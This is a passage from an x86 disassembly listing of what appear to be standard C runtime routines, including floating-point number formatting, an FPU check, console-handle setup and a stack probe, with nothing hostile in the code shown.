; ---------------------------------------------------------------------------
loc_4111DF: ; CODE XREF: sub_41105D+17Bj
mov [ebp+var_14], 3FEh
jmp short loc_4111EC
; ---------------------------------------------------------------------------
loc_4111E8: ; CODE XREF: sub_41105D+168j
mov byte ptr [esi], 31h
inc esi
loc_4111EC: ; CODE XREF: sub_41105D+180j
; sub_41105D+189j
mov eax, esi
inc esi
cmp [ebp+arg_C], edx
mov [ebp+arg_4], eax
jnz short loc_4111FB
mov [eax], dl
jmp short loc_41120A
; ---------------------------------------------------------------------------
loc_4111FB: ; CODE XREF: sub_41105D+198j
mov ecx, [ebp+var_24]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov cl, [ecx]
mov [eax], cl
loc_41120A: ; CODE XREF: sub_41105D+19Cj
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
mov [ebp+var_8], ecx
ja short loc_411222
cmp eax, edx
jbe loc_4112D7
loc_411222: ; CODE XREF: sub_41105D+1BBj
mov [ebp+var_C], edx
mov [ebp+var_8], 0F0000h
loc_41122C: ; CODE XREF: sub_41105D+220j
cmp [ebp+arg_C], 0
jle short loc_41127F
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_411C90
add ax, 30h
movzx eax, ax
cmp ax, 39h
jbe short loc_41125B
add eax, ebx
loc_41125B: ; CODE XREF: sub_41105D+1FAj
mov ecx, [ebp+var_8]
sub [ebp+var_4], 4
mov [esi], al
mov eax, [ebp+var_C]
shrd eax, ecx, 4
shr ecx, 4
inc esi
dec [ebp+arg_C]
cmp word ptr [ebp+var_4], 0
mov [ebp+var_C], eax
mov [ebp+var_8], ecx
jge short loc_41122C
loc_41127F: ; CODE XREF: sub_41105D+1D3j
cmp word ptr [ebp+var_4], 0
jl short loc_4112D7
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_411C90
cmp ax, 8
jbe short loc_4112D7
lea eax, [esi-1]
loc_4112A9: ; CODE XREF: sub_41105D+25Cj
mov cl, [eax]
cmp cl, 66h
jz short loc_4112B5
cmp cl, 46h
jnz short loc_4112BB
loc_4112B5: ; CODE XREF: sub_41105D+251j
mov byte ptr [eax], 30h
dec eax
jmp short loc_4112A9
; ---------------------------------------------------------------------------
loc_4112BB: ; CODE XREF: sub_41105D+256j
cmp eax, [ebp+arg_4]
jz short loc_4112D4
mov cl, [eax]
cmp cl, 39h
jnz short loc_4112CE
add bl, 3Ah
mov [eax], bl
jmp short loc_4112D7
; ---------------------------------------------------------------------------
loc_4112CE: ; CODE XREF: sub_41105D+268j
inc cl
mov [eax], cl
jmp short loc_4112D7
; ---------------------------------------------------------------------------
loc_4112D4: ; CODE XREF: sub_41105D+261j
inc byte ptr [eax-1]
loc_4112D7: ; CODE XREF: sub_41105D+1BFj
; sub_41105D+227j ...
cmp [ebp+arg_C], 0
jle short loc_4112EE
push [ebp+arg_C]
push 30h
push esi
call sub_407F20
add esp, 0Ch
add esi, [ebp+arg_C]
loc_4112EE: ; CODE XREF: sub_41105D+27Ej
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_4112F8
mov esi, eax
loc_4112F8: ; CODE XREF: sub_41105D+297j
cmp [ebp+arg_10], 0
mov cl, 34h
setz al
dec al
and al, 0E0h
add al, 70h
mov [esi], al
mov eax, [edi]
mov edx, [edi+4]
inc esi
call sub_411C90
xor ebx, ebx
and eax, 7FFh
and edx, ebx
sub eax, [ebp+var_14]
push ebx
pop ecx
sbb edx, ecx
js short loc_411332
jg short loc_41132C
cmp eax, ebx
jb short loc_411332
loc_41132C: ; CODE XREF: sub_41105D+2C9j
mov byte ptr [esi], 2Bh
inc esi
jmp short loc_41133C
; ---------------------------------------------------------------------------
loc_411332: ; CODE XREF: sub_41105D+2C7j
; sub_41105D+2CDj
mov byte ptr [esi], 2Dh
inc esi
neg eax
adc edx, ebx
neg edx
loc_41133C: ; CODE XREF: sub_41105D+2D3j
cmp edx, ebx
mov edi, esi
mov byte ptr [esi], 30h
jl short loc_411369
mov ecx, 3E8h
jg short loc_411350
cmp eax, ecx
jb short loc_411369
loc_411350: ; CODE XREF: sub_41105D+2EDj
push ebx
push ecx
push edx
push eax
call sub_411BB0
add al, 30h
mov [esi], al
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov eax, ecx
mov edx, ebx
jnz short loc_411374
loc_411369: ; CODE XREF: sub_41105D+2E6j
; sub_41105D+2F1j
test edx, edx
jl short loc_41138B
jg short loc_411374
cmp eax, 64h
jb short loc_41138B
loc_411374: ; CODE XREF: sub_41105D+30Aj
; sub_41105D+310j
push 0
push 64h
push edx
push eax
call sub_411BB0
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov edx, ebx
loc_41138B: ; CODE XREF: sub_41105D+30Ej
; sub_41105D+315j
cmp esi, edi
jnz short loc_41139A
test edx, edx
jl short loc_4113B2
jg short loc_41139A
cmp eax, 0Ah
jb short loc_4113B2
loc_41139A: ; CODE XREF: sub_41105D+330j
; sub_41105D+336j
push 0
push 0Ah
push edx
push eax
call sub_411BB0
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov [ebp+var_10], ebx
loc_4113B2: ; CODE XREF: sub_41105D+334j
; sub_41105D+33Bj
add al, 30h
mov [esi], al
mov byte ptr [esi+1], 0
loc_4113BA: ; CODE XREF: sub_41105D+10Bj
; sub_41105D+126j
cmp [ebp+var_18], 0
jz short loc_4113C7
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4113C7: ; CODE XREF: sub_41105D+361j
xor eax, eax
loc_4113C9: ; CODE XREF: sub_41105D+D0j
; sub_41105D+DDj
pop ebx
loc_4113CA: ; CODE XREF: sub_41105D+58j
pop edi
pop esi
leave
retn
sub_41105D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113CE proc near ; CODE XREF: sub_4114C3+A2p
; sub_41157C+C3p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_C]
mov ebx, eax
mov esi, [ebx+4]
mov edi, ecx
lea ecx, [ebp+var_10]
dec esi
call sub_402AEB
test edi, edi
jnz short loc_41141B
loc_4113EE: ; CODE XREF: sub_4113CE+51j
call sub_405B83
push 16h
pop esi
mov [eax], esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_403305
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_411414
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411414: ; CODE XREF: sub_4113CE+3Dj
mov eax, esi
jmp loc_4114BE
; ---------------------------------------------------------------------------
loc_41141B: ; CODE XREF: sub_4113CE+1Ej
cmp [ebp+arg_0], 0
jbe short loc_4113EE
cmp [ebp+arg_8], 0
jz short loc_41143F
cmp esi, [ebp+arg_4]
jnz short loc_41143F
xor eax, eax
cmp dword ptr [ebx], 2Dh
setz al
add eax, esi
add eax, edi
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
loc_41143F: ; CODE XREF: sub_4113CE+57j
; sub_4113CE+5Cj
cmp dword ptr [ebx], 2Dh
mov esi, edi
jnz short loc_41144C
mov byte ptr [edi], 2Dh
lea esi, [edi+1]
loc_41144C: ; CODE XREF: sub_4113CE+76j
mov eax, [ebx+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_411463
mov eax, esi
call sub_410DCB
mov byte ptr [esi], 30h
inc esi
jmp short loc_411465
; ---------------------------------------------------------------------------
loc_411463: ; CODE XREF: sub_4113CE+86j
add esi, eax
loc_411465: ; CODE XREF: sub_4113CE+93j
cmp [ebp+arg_4], 0
jle short loc_4114AF
mov eax, esi
call sub_410DCB
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
mov ebx, [ebx+4]
inc esi
test ebx, ebx
jge short loc_4114AF
neg ebx
cmp [ebp+arg_8], 0
jnz short loc_411496
cmp [ebp+arg_4], ebx
jl short loc_411499
loc_411496: ; CODE XREF: sub_4113CE+C1j
mov [ebp+arg_4], ebx
loc_411499: ; CODE XREF: sub_4113CE+C6j
mov edi, [ebp+arg_4]
mov eax, esi
call sub_410DCB
push edi
push 30h
push esi
call sub_407F20
add esp, 0Ch
loc_4114AF: ; CODE XREF: sub_4113CE+9Bj
; sub_4113CE+B9j
cmp [ebp+var_4], 0
jz short loc_4114BC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4114BC: ; CODE XREF: sub_4113CE+E5j
xor eax, eax
loc_4114BE: ; CODE XREF: sub_4113CE+48j
pop edi
pop esi
pop ebx
leave
retn
sub_4113CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114C3 proc near ; CODE XREF: sub_411674+24p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411B21
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_411513
loc_4114FB: ; CODE XREF: sub_4114C3+55j
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_41156D
; ---------------------------------------------------------------------------
loc_411513: ; CODE XREF: sub_4114C3+36j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_4114FB
cmp eax, 0FFFFFFFFh
jnz short loc_411523
or eax, eax
jmp short loc_41152E
; ---------------------------------------------------------------------------
loc_411523: ; CODE XREF: sub_4114C3+5Aj
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
loc_41152E: ; CODE XREF: sub_4114C3+5Ej
mov esi, [ebp+arg_C]
lea ecx, [ebp+var_2C]
push ecx
mov ecx, [ebp+var_28]
add ecx, esi
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
add eax, edi
push eax
call sub_4119A9
add esp, 10h
cmp eax, ebx
jz short loc_411558
mov [edi], bl
jmp short loc_41156D
; ---------------------------------------------------------------------------
loc_411558: ; CODE XREF: sub_4114C3+8Fj
push [ebp+arg_10]
lea eax, [ebp+var_2C]
push ebx
push esi
push [ebp+arg_8]
mov ecx, edi
call sub_4113CE
add esp, 10h
loc_41156D: ; CODE XREF: sub_4114C3+4Ej
; sub_4114C3+93j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_4114C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41157C proc near ; CODE XREF: sub_411674+4Ap
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 16h
pop edi
push edi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411B21
xor ebx, ebx
add esp, 14h
cmp esi, ebx
jnz short loc_4115CF
loc_4115B4: ; CODE XREF: sub_41157C+58j
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], edi
call sub_403305
add esp, 14h
mov eax, edi
jmp loc_411665
; ---------------------------------------------------------------------------
loc_4115CF: ; CODE XREF: sub_41157C+36j
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jbe short loc_4115B4
mov eax, [ebp+var_2C]
dec eax
mov [ebp+var_20], eax
xor eax, eax
cmp [ebp+var_30], 2Dh
setz al
cmp ecx, 0FFFFFFFFh
lea edi, [eax+esi]
jnz short loc_4115F2
or ecx, ecx
jmp short loc_4115F4
; ---------------------------------------------------------------------------
loc_4115F2: ; CODE XREF: sub_41157C+70j
sub ecx, eax
loc_4115F4: ; CODE XREF: sub_41157C+74j
lea eax, [ebp+var_30]
push eax
push [ebp+arg_C]
push ecx
push edi
call sub_4119A9
add esp, 10h
cmp eax, ebx
jz short loc_41160D
mov [esi], bl
jmp short loc_411665
; ---------------------------------------------------------------------------
loc_41160D: ; CODE XREF: sub_41157C+8Bj
mov eax, [ebp+var_2C]
dec eax
cmp [ebp+var_20], eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_411649
cmp eax, [ebp+arg_C]
jge short loc_411649
cmp cl, bl
jz short loc_41162F
loc_411625: ; CODE XREF: sub_41157C+AEj
mov al, [edi]
inc edi
test al, al
jnz short loc_411625
mov [edi-2], bl
loc_41162F: ; CODE XREF: sub_41157C+A7j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push [ebp+arg_C]
mov ecx, esi
push [ebp+arg_8]
call sub_4113CE
add esp, 10h
jmp short loc_411665
; ---------------------------------------------------------------------------
loc_411649: ; CODE XREF: sub_41157C+9Ej
; sub_41157C+A3j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push eax
push [ebp+arg_10]
mov eax, esi
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410E04
add esp, 18h
loc_411665: ; CODE XREF: sub_41157C+4Ej
; sub_41157C+8Fj ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_41157C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411674 proc near ; CODE XREF: sub_4116FA+17p
; DATA XREF: sub_40FABC+37o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
cmp eax, 65h
jz short loc_4116DE
cmp eax, 45h
jz short loc_4116DE
cmp eax, 66h
jnz short loc_4116A2
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4114C3
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4116A2: ; CODE XREF: sub_411674+13j
cmp eax, 61h
jz short loc_4116C5
cmp eax, 41h
jz short loc_4116C5
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41157C
jmp short loc_4116F5
; ---------------------------------------------------------------------------
loc_4116C5: ; CODE XREF: sub_411674+31j
; sub_411674+36j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41105D
jmp short loc_4116F5
; ---------------------------------------------------------------------------
loc_4116DE: ; CODE XREF: sub_411674+9j
; sub_411674+Ej
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410F71
loc_4116F5: ; CODE XREF: sub_411674+4Fj
; sub_411674+68j
add esp, 18h
pop ebp
retn
sub_411674 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116FA proc near ; DATA XREF: sub_40FABCo
; .data:off_423F80o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411674
add esp, 1Ch
pop ebp
retn
sub_4116FA endp
; =============== S U B R O U T I N E =======================================
sub_41171B proc near ; CODE XREF: sub_40FB1C+16p
push esi
push 30000h
push 10000h
xor esi, esi
push esi
call sub_411CAF
add esp, 0Ch
test eax, eax
jz short loc_411742
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_411742: ; CODE XREF: sub_41171B+18j
pop esi
retn
sub_41171B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411744 proc near ; CODE XREF: sub_411780:loc_4117A4j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41EE80
fstp [ebp+var_10]
fld ds:dbl_41EE78
fstp [ebp+var_18]
fld [ebp+var_18]
fdiv [ebp+var_10]
fmul [ebp+var_10]
fsubr [ebp+var_18]
fstp [ebp+var_8]
fld1
fcomp [ebp+var_8]
fnstsw ax
test ah, 5
jp short loc_41177C
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_41177C: ; CODE XREF: sub_411744+31j
xor eax, eax
leave
retn
sub_411744 endp
; =============== S U B R O U T I N E =======================================
sub_411780 proc near ; CODE XREF: sub_40FB1C+5p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41D0E0 ; GetModuleHandleA
test eax, eax
jz short loc_4117A4
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:off_41D0E8
test eax, eax
jz short loc_4117A4
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4117A4: ; CODE XREF: sub_411780+Dj
; sub_411780+1Dj
jmp sub_411744
sub_411780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4117B0 proc near ; CODE XREF: sub_410860+11j
; .text:00410887j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_4117C4: ; CODE XREF: sub_4117B0+29j
cmp ecx, eax
jb short loc_4117D2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_4117D2: ; CODE XREF: sub_4117B0+16j
sub eax, 1000h
test [eax], eax
jmp short loc_4117C4
sub_4117B0 endp
; =============== S U B R O U T I N E =======================================
sub_4117DB proc near ; CODE XREF: sub_41088C+24p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call ds:off_41D06C
mov dword_424224, eax
retn
sub_4117DB endp
; =============== S U B R O U T I N E =======================================
sub_4117FA proc near ; DATA XREF: fabskl8p:0041D2F4o
mov eax, dword_424224
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:off_41D0D8
jz short loc_411813
cmp eax, 0FFFFFFFEh
jz short loc_411813
push eax
call esi ; sub_4588BA
loc_411813: ; CODE XREF: sub_4117FA+Fj
; sub_4117FA+14j
mov eax, dword_424220
cmp eax, 0FFFFFFFFh
jz short loc_411825
cmp eax, 0FFFFFFFEh
jz short loc_411825
push eax
call esi ; sub_4588BA
loc_411825: ; CODE XREF: sub_4117FA+21j
; sub_4117FA+26j
pop esi
retn
sub_4117FA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411830 proc near ; CODE XREF: sub_41105D+102p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_411857
xor eax, eax
jmp short loc_411859
; ---------------------------------------------------------------------------
loc_411857: ; CODE XREF: sub_411830+21j
mov eax, edi
loc_411859: ; CODE XREF: sub_411830+25j
cld
pop edi
leave
retn
sub_411830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41185D proc near ; CODE XREF: sub_410D74+15p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_402AEB
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41279D
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411D19
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4118DA
cmp eax, 1
jnz short loc_4118C5
loc_4118B4: ; CODE XREF: sub_41185D+87j
cmp [ebp+var_18], bl
jz short loc_4118C0
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4118C0: ; CODE XREF: sub_41185D+5Aj
push 3
loc_4118C2: ; CODE XREF: sub_41185D+7Bj
pop eax
jmp short loc_4118F4
; ---------------------------------------------------------------------------
loc_4118C5: ; CODE XREF: sub_41185D+55j
cmp eax, 2
jnz short loc_4118E6
loc_4118CA: ; CODE XREF: sub_41185D+81j
cmp [ebp+var_18], bl
jz short loc_4118D6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4118D6: ; CODE XREF: sub_41185D+70j
push 4
jmp short loc_4118C2
; ---------------------------------------------------------------------------
loc_4118DA: ; CODE XREF: sub_41185D+50j
test byte ptr [ebp+var_14], 1
jnz short loc_4118CA
test byte ptr [ebp+var_14], 2
jnz short loc_4118B4
loc_4118E6: ; CODE XREF: sub_41185D+6Bj
cmp [ebp+var_18], bl
jz short loc_4118F2
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4118F2: ; CODE XREF: sub_41185D+8Cj
xor eax, eax
loc_4118F4: ; CODE XREF: sub_41185D+66j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_41185D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411903 proc near ; CODE XREF: sub_410D74+2Ep
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_402AEB
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41279D
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_41225B
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_411980
cmp eax, 1
jnz short loc_41196B
loc_41195A: ; CODE XREF: sub_411903+87j
cmp [ebp+var_18], bl
jz short loc_411966
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411966: ; CODE XREF: sub_411903+5Aj
push 3
loc_411968: ; CODE XREF: sub_411903+7Bj
pop eax
jmp short loc_41199A
; ---------------------------------------------------------------------------
loc_41196B: ; CODE XREF: sub_411903+55j
cmp eax, 2
jnz short loc_41198C
loc_411970: ; CODE XREF: sub_411903+81j
cmp [ebp+var_18], bl
jz short loc_41197C
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_41197C: ; CODE XREF: sub_411903+70j
push 4
jmp short loc_411968
; ---------------------------------------------------------------------------
loc_411980: ; CODE XREF: sub_411903+50j
test byte ptr [ebp+var_14], 1
jnz short loc_411970
test byte ptr [ebp+var_14], 2
jnz short loc_41195A
loc_41198C: ; CODE XREF: sub_411903+6Bj
cmp [ebp+var_18], bl
jz short loc_411998
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411998: ; CODE XREF: sub_411903+8Cj
xor eax, eax
loc_41199A: ; CODE XREF: sub_411903+66j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_411903 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119A9 proc near ; CODE XREF: sub_410F71+96p
; sub_4114C3+85p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_C]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ecx+0Ch]
jnz short loc_4119DC
loc_4119BE: ; CODE XREF: sub_4119A9+36j
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_4119C8: ; CODE XREF: sub_4119A9+59j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
mov eax, esi
jmp loc_411A61
; ---------------------------------------------------------------------------
loc_4119DC: ; CODE XREF: sub_4119A9+13j
cmp [ebp+arg_4], ebx
jbe short loc_4119BE
mov edx, [ebp+arg_8]
cmp edx, ebx
mov [esi], bl
jle short loc_4119EE
mov eax, edx
jmp short loc_4119F0
; ---------------------------------------------------------------------------
loc_4119EE: ; CODE XREF: sub_4119A9+3Fj
xor eax, eax
loc_4119F0: ; CODE XREF: sub_4119A9+43j
inc eax
cmp [ebp+arg_4], eax
ja short loc_411A04
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4119C8
; ---------------------------------------------------------------------------
loc_411A04: ; CODE XREF: sub_4119A9+4Bj
cmp edx, ebx
mov byte ptr [esi], 30h
lea eax, [esi+1]
jle short loc_411A28
loc_411A0E: ; CODE XREF: sub_4119A9+7Aj
mov cl, [edi]
cmp cl, bl
jz short loc_411A1A
movsx ecx, cl
inc edi
jmp short loc_411A1D
; ---------------------------------------------------------------------------
loc_411A1A: ; CODE XREF: sub_4119A9+69j
push 30h
pop ecx
loc_411A1D: ; CODE XREF: sub_4119A9+6Fj
mov [eax], cl
inc eax
dec edx
cmp edx, ebx
jg short loc_411A0E
mov ecx, [ebp+arg_C]
loc_411A28: ; CODE XREF: sub_4119A9+63j
cmp edx, ebx
mov [eax], bl
jl short loc_411A40
cmp byte ptr [edi], 35h
jl short loc_411A40
jmp short loc_411A38
; ---------------------------------------------------------------------------
loc_411A35: ; CODE XREF: sub_4119A9+93j
mov byte ptr [eax], 30h
loc_411A38: ; CODE XREF: sub_4119A9+8Aj
dec eax
cmp byte ptr [eax], 39h
jz short loc_411A35
inc byte ptr [eax]
loc_411A40: ; CODE XREF: sub_4119A9+83j
; sub_4119A9+88j
cmp byte ptr [esi], 31h
jnz short loc_411A4A
inc dword ptr [ecx+4]
jmp short loc_411A5F
; ---------------------------------------------------------------------------
loc_411A4A: ; CODE XREF: sub_4119A9+9Aj
lea edi, [esi+1]
push edi
call sub_4044E0
inc eax
push eax
push edi
push esi
call sub_407720
add esp, 10h
loc_411A5F: ; CODE XREF: sub_4119A9+9Fj
xor eax, eax
loc_411A61: ; CODE XREF: sub_4119A9+2Ej
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4119A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A66 proc near ; CODE XREF: sub_411B21+24p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
movzx eax, word ptr [edx+6]
push ebx
mov ecx, eax
push esi
push edi
shr ecx, 4
and eax, 8000h
mov edi, 7FFh
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_411AB4
cmp ebx, edi
jz short loc_411AAD
add ecx, 3C00h
jmp short loc_411AD5
; ---------------------------------------------------------------------------
loc_411AAD: ; CODE XREF: sub_411A66+3Dj
mov edi, 7FFFh
jmp short loc_411AD8
; ---------------------------------------------------------------------------
loc_411AB4: ; CODE XREF: sub_411A66+39j
xor ebx, ebx
cmp eax, ebx
jnz short loc_411ACC
cmp edx, ebx
jnz short loc_411ACC
